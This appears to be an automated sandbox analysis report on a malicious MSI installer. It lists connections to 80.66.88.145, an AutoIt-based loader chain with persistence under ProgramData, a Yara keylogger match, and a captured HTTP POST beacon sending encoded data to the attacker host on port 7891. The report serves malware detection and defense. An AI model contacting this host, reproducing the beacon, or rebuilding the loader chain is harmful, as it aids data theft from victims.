Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145

Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.
Source: cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145
Source: Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145&
Source: cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:7891
Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999d
Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999hd
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999l
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999n
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999pT$
Source: cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999x
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nexus.officeapps.live.comh
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown

HTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 658Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_00428238 recv,

9_2_00428238

Creates a DirectInput object (often for capturing keystrokes)

Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Autoit3.exe PID: 7204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SciTE.exe PID: 7396, type: MEMORYSTR

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIDAD.tmp

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004222B4	9_2_004222B4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045652C	9_2_0045652C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00456778	9_2_00456778

Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00404500 appears 50 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00404554 appears 55 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 004049DC appears 65 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00406B98 appears 77 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00446258 appears 33 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 00455C58 appears 539 times

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: unknown	Process created: C:\ProgramData\fkeabad\Autoit3.exe "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
